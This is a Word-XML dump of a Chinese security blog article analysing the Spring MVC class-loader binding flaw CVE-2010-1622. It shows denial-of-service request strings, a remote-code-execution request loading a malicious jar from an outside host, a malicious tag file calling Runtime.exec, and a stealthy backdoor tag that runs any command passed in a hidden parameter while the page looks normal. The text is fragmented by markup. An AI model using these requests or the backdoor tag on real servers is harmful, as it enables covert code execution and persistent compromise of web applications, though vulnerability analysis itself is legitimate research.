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 xml:space="preserve">By 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http://www.inbreak.net/ @javasecurity http://t.qq.com/javasecurity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摘要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这个漏洞在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2010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年出的，当时由于环境问题，并没有找到稳定利用的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EXP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。作者对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框架不熟悉，很多地方不了解，结果研究了一半，证明了漏洞的部分严重性就放下了，没有弄出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来。最近同事也想研究下，勾起了研究兴趣，结果运气爆发，解决了当年没有搞定的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N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多问题和错误，这才终于让服务器上的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CALC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跑起来。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当然，本文不会提供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，只是对官方的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分析一下，以及告诉大家怎么写自己想要的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EXP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，本文不会提供黑客工具，只讨论技术。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正文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个漏洞其实有两种玩法，一种是拒绝服务，一种是远程代码执行，其中还隐藏着一些其他技术内幕。我们先从拒绝服务讲起，漏洞发布者并没有提到这里可能出现拒绝服务攻击，这是本文作者无意中发现的。这个发现可以绕过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的某段挫代码，下文中会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弱弱的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提到这个挫代码事情。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漏洞发布者的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blog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http://blog.o0o.nu/2010/06/cve-2010-1622.html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这篇文档其实对漏洞的介绍，已经非常明确了，基本上翻译过来就可以明了事情的经过，这里按照自己的语言，讲讲重要的东西。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这是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的漏洞，而这个漏洞的最佳体现，是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框架。经典的应用，经典的代码，最终却会造成漏洞，这是框架漏洞的经典体现。开发人员如果使用了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框架，必然会这样写代码，官方也推荐表单绑定对象这种做法，这种做法，却由于框架的环境，导致了漏洞。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漏洞原理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可以让开发者定义一个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java bean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对象，实现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getter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setter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方法，之后绑定到表单中，以方便开发人员使用。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这段代码，是一个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java bean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对象，叫做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User.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User </w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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name</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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getName</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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name</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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宋体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setName</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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name</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F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宋体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宋体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name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 xml:space="preserve"> name</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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宋体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宋体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可以把它绑定到一个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Controller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@Controller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TestController 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>@RequestMapping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"/test.htm"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execute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User user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){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System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out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println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user.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getName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())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"success"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用户就可以直接提交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lastRenderedPageBreak/>
              <w:t>http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//www.inbreak.net/test.htm?name=kxlzx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于是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TestController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就会自动把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name=kxlzx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变成对象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user.name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的值。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这一切自动的过程，得益于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提供的字段映射功能，这个功能会自动发现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user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对象中的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public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方法和字段，如果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user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中出现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public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的一个字段，就自动绑定，并且允许用户提交请求给他赋值。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比如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user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类中出现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用户提交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name=kxlzx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，就可以给它赋值。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如果出现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public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setter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方法，也会允许赋值。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比如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user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类中出现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setName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617F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name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即可允许用户提交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name=kxlzx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赋值。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但是如果是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并且没有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setter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方法，就会不允许赋值。这也是出于安全考虑，不能把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user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中所有的属性都暴露出去。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现在问题来了，在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java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的世界里，所有的对象，都默认继承了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Object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基础类，这个类竟然有个方法叫做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getClass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意味着所有的对象，包括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user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在内，用户默认都可以使用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//www.inbreak.net/test.htm?class=xxx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去给它赋值。当然，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的类型并不是基础类型（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string,int,long,double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等等），所以用户即使提交了赋值其实没有任何含义。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好在我们可以继续访问下去，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Object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getClass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方法，返回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对象，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对象中有个方法叫做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getClassLoader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，这个方法返回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对象，用户可以这样访问。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//www.inbreak.net/test.htm?class.classLoader=xxx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危险的东西出现了，此对象，代表着程序运行环境的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。随着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容器的不同，大家对这个东西的实现方式不一样。在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上，也就是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拿到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上运行时，它会变成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org.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apache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catalina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loader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WebappClassLoader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可以从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api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文档中，查到这个类的一些字段。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0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//tomcat.apache.org/tomcat-6.0-doc/api/org/apache/catalina/loader/WebappClassLoader.html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一旦这个类中，出现了可以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set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的字段，用户就可以提交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请求，改变其中的值。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classLoader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是一个可以影响所有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加载的重要东西，一旦其中一些字段发生改变，应用程序中就可能会发生各种诡异的事情，造成应用不正常，甚至所有页面都访问出错。你知道我在说什么，是的，拒绝服务。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Spring mvc </w:t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拒绝服务漏洞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翻阅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api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文档，可以看到有很多字段，都实现了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setter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方法，这些字段名称比较诡异，大多都是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对我们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”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没什么作用的字段，影响不大。唯有一个危险字段，叫做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delegate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，这个字段可以直接修改掉。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setDelegate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617F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delegate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delegate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delegate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这个字段，是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决定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加载顺序用的，或许在这文章中，和大家扯一段类加载的东西不太容易理解，所以不提原理，我们看篇文章，请大家直接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google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，作者就不点名了。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java.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lang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ClassCastException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org.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apache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catalina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util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DefaultAnnotationProcessor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解决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文章中会讲到两个信息：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1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、他们遇到了严重错误，导致所有页面打不开，爆这个错误。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2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、网友们建议的解决方式，是设置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如下：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在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tomcat  conf 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下目录中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context.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xml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中增加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如下节点即可。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Loader delegate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"true"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也就是说，这个值，必须设置为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true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，否则他的应用就会挂掉。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下面做个小测试，在我们项目中加入一个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lib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下的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jar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包，叫做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“catalina.jar”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，放入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/WEB-INF/lib/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下面，启动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，于是所有的页面，都打不开了。按照解决方式，设置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后，变为正常。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但是出了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的远程代码执行漏洞后，这个设置会变得非常脆弱，只要攻击者提交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//www.inbreak.net/springmvc/testjsp.htm?class.classLoader.delegate=false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就会有很多页面，都出现下图这个诡异的问题。这是因为第一次编译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jsp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页面时，由于类加载顺序错误，而产生的错误。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699000" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="http://www.inbreak.net/wp-content/uploads/2012/04/image00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break.net/wp-content/uploads/2012/04/image00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打开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后，凡是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启动后，曾经被访问过一次以上的页面，都是正常的，只有那些从来没有访问过的页面，第一次访问时，就会出现这个错误。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真是怪异的答案，这是另类的拒绝服务攻击，有些页面正常，有些页面不正常，只要控制好攻击时间，这个攻击时间，和启动服务器的时间越近，威力越大。其实威力大不大无所谓，因为没有任何一个网站，所有的页面，会在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1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天内被人访问个遍，所以作为系统管理员，看到这个错误，已经非常头疼了。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struts2 dos</w:t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漏洞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是的，它也受影响。远程代码执行漏洞，是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出的，很多项目都用到了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的核心，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只是这个漏洞的最佳体现而已。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其实也本该是个导致远程代码执行漏洞才对，只是因为它的字段映射问题，只映射基础类型，默认不负责映射其他类型，所以当攻击者直接提交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URLs[0]=xxx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时，直接爆字段类型转换错误，结果才侥幸逃过一劫罢了。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逃得了初一，却逃不过十五，在攻击者提交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//www.inbreak.net/struts2/testjsp.htm?class.classLoader.delegate=false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给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时，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看到的是个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boolean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类型，属于基础类型，所以这个值就被修改掉了。当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容器是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时，它一样受到影响，现象和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一致。这里就不抓图了。顺便说上一句，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提供自定义类型转换功能，欢迎大家把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类，做自定义类型转换处理，有了这个处理，效果就和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中的远程代码执行一致了。作者还不至于找个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struts2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应用，故意配置一个自定义类型转换后，假装自己发现了个远程代码执行漏洞。只是想来这种业务场景极少，比较适合对公司不满的开发人员留后门用，谁又能想到开发一个这样没有意义的功能，居然有天会引发远程代码执行呢？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Spring mvc</w:t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数组只读权限绕过漏洞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非常有趣的特性，前文提到，只有在一个字段为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public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，或者字段的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setter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方法为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public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时，才会允许用户提交参数，修改这个字段的值。所以这里是个权限绕过漏洞，当一个数组对象的代码如下：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names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User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(){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 xml:space="preserve">names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[]{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String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[]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getNames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names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看到了，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names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这个数组，只是在构造方法中初始化了一下，并没有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public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setter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方法出来，甚至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setter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方法都没有实现。理论上，应该是个只读的字段，但是只要用户提交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//www.inbreak.net/springmvc/testjsp.htm?names[0]=xxxxx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它的值，居然被修改了！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这个漏洞，是远程代码执行漏洞的基础，如果这样的值不能被修改，也就不可能出现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被修改后，导致的远程代码执行漏洞了。现在大家知道了这样的代码会出问题，再看看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WebappLoader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类，继承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URLClassLoader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类，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URLClassLoader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的一个方法叫做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getURLs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，返回一个数组。只要一个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getter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返回的是一个数组，就会绕过安全限制。下面我们继续看看远程代码执行是怎么产生的。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Spring mvc</w:t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远程代码执行漏洞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这里才是主料的开始，现在再来看看怎么才能远程代码执行，每次想到这里，都会想到这个老外太有才了。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getURLs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方法，其实用的地方真的不多，只有在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TldLocationsCache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类，对页面的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标签库处理时，才会从这一堆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中获取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文件。它的原理是从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中指定的目录，去获取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文件，允许从网络中获取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文件。当一个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放在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jar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中时，可以通过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jar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//www.inbreak.net/kxlzx.jar!/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，会下载到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服务器一个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jar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文件，然后从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jar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文件中，寻找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文件，并且根据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文件，做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标签库的进一步解析。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文件自己有个标准（详见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jsp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标签库），在解析的时候，是允许直接使用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jsp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语法的，所以这就出现了远程代码执行的最终效果。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这是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spring-form.tld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原本的部分内容示例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337050" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://www.inbreak.net/wp-content/uploads/2012/04/image003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break.net/wp-content/uploads/2012/04/image003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Form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标签里面有个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的标签，会根据开发人员的定义，给这些参数默认赋值，前面说到它是支持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jsp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语法的，所以拿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原本的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/META-INF/spring-form.tld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文件，替换其中内容，可以把这个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的原本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 tag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的内容替换为：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&lt;!--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form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tag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--&gt;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tag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file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name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name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path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META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INF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tags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InputTag.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tag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path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tag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file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这样指定让一个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tag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文件解析。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还缺一个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/META-INF/tags/InputTag.tag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@ tag dynamic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attributes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"dynattrs"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j java.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lang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3399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Runtime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getRuntime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exec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"mkdir /tmp/PWNED"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做出这样的替换后，当开发者在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controller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中将任何一个对象绑定表单，并且最终展示的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jsp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内容有下面这些：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&lt;%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@ taglib prefix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"form"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uri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"http://www.springframework.org/tags/form"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%&gt;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form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form commandName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"user"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form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 path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"name"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form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form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攻击者访问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url:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="108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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="0059617F" w:rsidRPr="0059617F" w:rsidTr="0059617F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1083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http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i/>
                <w:iCs/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>//www.inbreak.net/springmvc/testjsp.htm? class.classLoader.URLs[0]=jar:http://www.inbreak.net/spring-exploit.jar!/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即可触发远程代码执行的效果，漏洞发布者写的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真的很囧。原本页面会显示一个文本框才对，现在变成了一个空白，并且后台执行命令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mkdir /tmp/PWNED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注意，是所有的页面，凡是有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的地方，都会变成空白，这个标签直接被替换掉。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Tomcat</w:t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的开发人员抽风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不得不说，想触发漏洞，其实还得过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这一关，这才是几次研究，都失败的罪魁祸首，真够恼火。想不通，这个漏洞关你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鸟事？你有事没事出个补丁，害的我调试不出来！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http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/loader/WebappClassLoader.java?r1=964215&amp;r2=966292&amp;pathrev=966292&amp;diff_format=h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居然在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tomcat6.0.28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之后的版本，把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repositoryURLs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改为了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repositoryURLs.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clone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()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还美其名曰：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Return copies of the URL array rather than the original. This facilitated CVE-2010-1622 although the root cause was in the Spring Framework. Returning a copy in this case seems like a good idea.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想骂这帮家伙，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good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你妹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idea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！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这样的修改，导致了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远程代码执行漏洞触发失败，就因为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拿到的是个克隆的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，不是真的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，给了一个山寨货，修改的并非原本的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URLs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。作者调试了很久很久，换了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N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种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 controller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的实现，都没有搞定。嗯。。。后来虎躯一震，猜到这是有个家伙在做手脚，果断翻阅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svn diff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，果然看到这个文件被一个阴险的家伙做了手脚。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也就是说，如果服务器大于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tomcat6.0.28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版本，远程代码执行，是不可能了，最多可以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DOS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一下，参见前文章节。写这一节，只是发发牢骚，大家调试时候注意一下，不要上当了。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和谐利用的</w:t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EXP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很显然，漏洞发布者提供的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EXP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是不符合期望的，一旦用了之后，被攻击的网站立刻显示异常，傻子都知道出了问题了。所以要改到和谐为止，想来和谐的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EXP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，应该是符合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想让它执行，就执行，不想让执行，就显示正常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“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下载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spring-form.tld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，给其中的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inputtag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改名，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name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改为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inputkxlzx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tag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name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inputkxlzx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name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随便什么名字都可以。新加入一个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tag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，叫做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tag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file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name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name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 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path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WEB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INF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tags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InputTag.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tag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path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 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tag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file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after="330"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InputTag.tag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的内容（本文只讨论技术，为减少危害，此文件不能直接使用，只有懂得人才可以看懂）：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="919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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="0059617F" w:rsidRPr="0059617F" w:rsidTr="0059617F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195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…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request.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getParameter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"kxlzxcmd"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!=</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000066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ab/>
              <w:t>exec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request.</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>getParameter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"kxlzxcmd"</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="009900"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>))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 xml:space="preserve"> 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…</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0059617F" w:rsidRPr="0059617F" w:rsidRDefault="0059617F" w:rsidP="00596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</w:pP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form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inputkxlzx path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9617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"${dynattrs.path}"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&gt;&lt;/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form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59617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>inputkxlzx</w:t>
            </w:r>
            <w:r w:rsidRPr="0059617F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="339933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59617F" w:rsidRPr="0059617F" w:rsidRDefault="0059617F" w:rsidP="0059617F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059617F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>精华就在这里，多么和谐啊，替换了原来的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 tag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，并且还拥有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 tag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的功能。页面显示的还是原来的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，不影响原本的业务逻辑，页面看不出什么来。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只有在攻击者提交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kxlzxcmd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时，会执行系统命令，其实这也不够和谐，最和谐的，是搞个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webshell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出来。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看看效果：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noProof/>
          <w:color w:val="4A630F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4826000" cy="2260600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://www.inbreak.net/wp-content/uploads/2012/04/image005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break.net/wp-content/uploads/2012/04/image005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这个叫做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name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仍然可以获取值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(kxlzx)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，正常使用不出错，只有参数中有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kxlzxcmd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时，才会触发。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总结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最后总结一下漏洞的局限：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1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 mvc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远程代码执行必须使用了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spring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标签库才可以，否则不能最终加载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tld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文件。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2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、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 xml:space="preserve">spring mvc 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拒绝服务漏洞只是一个随机出现的福利，因为服务器上的应用程序不一定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class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加载顺序倒置就会出问题。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3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、原公布者的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POC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是绝对不能用的，用了之后服务器只能等待重启了，只要你用了，就准备和管理员打招呼吧。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4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、本文所提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EXP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并非最好的，最好的当然是写个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shell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什么的。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5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、由于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exp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都是替换了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 tag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，所以必须当前页面中存在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input tag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，才能触发，当然一个正常的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web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应用中必然有这样的页面。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至于修补漏洞什么的大家自己查，这不是什么新漏洞，只是心血来潮的一篇分析文。技术是不能停止研究的，所以时不时得练练兵，所以才有了这篇。如果看懂了，至少写的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EXP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，是没问题的，也不至于老外发了这么旧的文章和公告，居然没有听到有人打成功过，而国内每次都是逐字翻译，木有任何自己的理解、研究和说明，这样不好。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链接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空虚浪子心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 xml:space="preserve"> http://www.inbreak.net/ @javasecurity http://t.qq.com/javasecurity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漏洞发布者的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blog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文：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t>http://blog.o0o.nu/2010/06/cve-2010-1622.html</w:t>
      </w:r>
      <w:r w:rsidRPr="0059617F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>80vul http://www.80vul.com/?q=content/spring-framework%EF%BC%88cve-2010-1622%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%8C%87%E5%8D%97</w:t>
      </w:r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75C" w:rsidRDefault="007E275C" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E275C" w:rsidRDefault="007E275C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59617F">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>7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59617F">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>7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75C" w:rsidRDefault="007E275C" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E275C" w:rsidRDefault="007E275C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7E275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7E275C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7E275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61A2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9617F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7E275C"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="009661A2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712C6C82-F4BE-4BC0-B67E-69CD98CA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961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9617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96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17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18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3362877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9220293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926439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1526898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10699376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9275530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674859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986203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2565310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8260727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1591406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78276897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4641699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8496139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5448358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9656138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7549006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1223477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026889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68891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1541425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1821833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935883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1865297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3685680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4550686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2524347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break.net/wp-content/uploads/2012/04/image002.jpg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inbreak.net/wp-content/uploads/2012/04/image005.jp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inbreak.net/wp-content/uploads/2012/04/image003.png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9EBFF-4626-49EC-8F29-2AF82B15A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2016-12-01T15:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-01T15:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>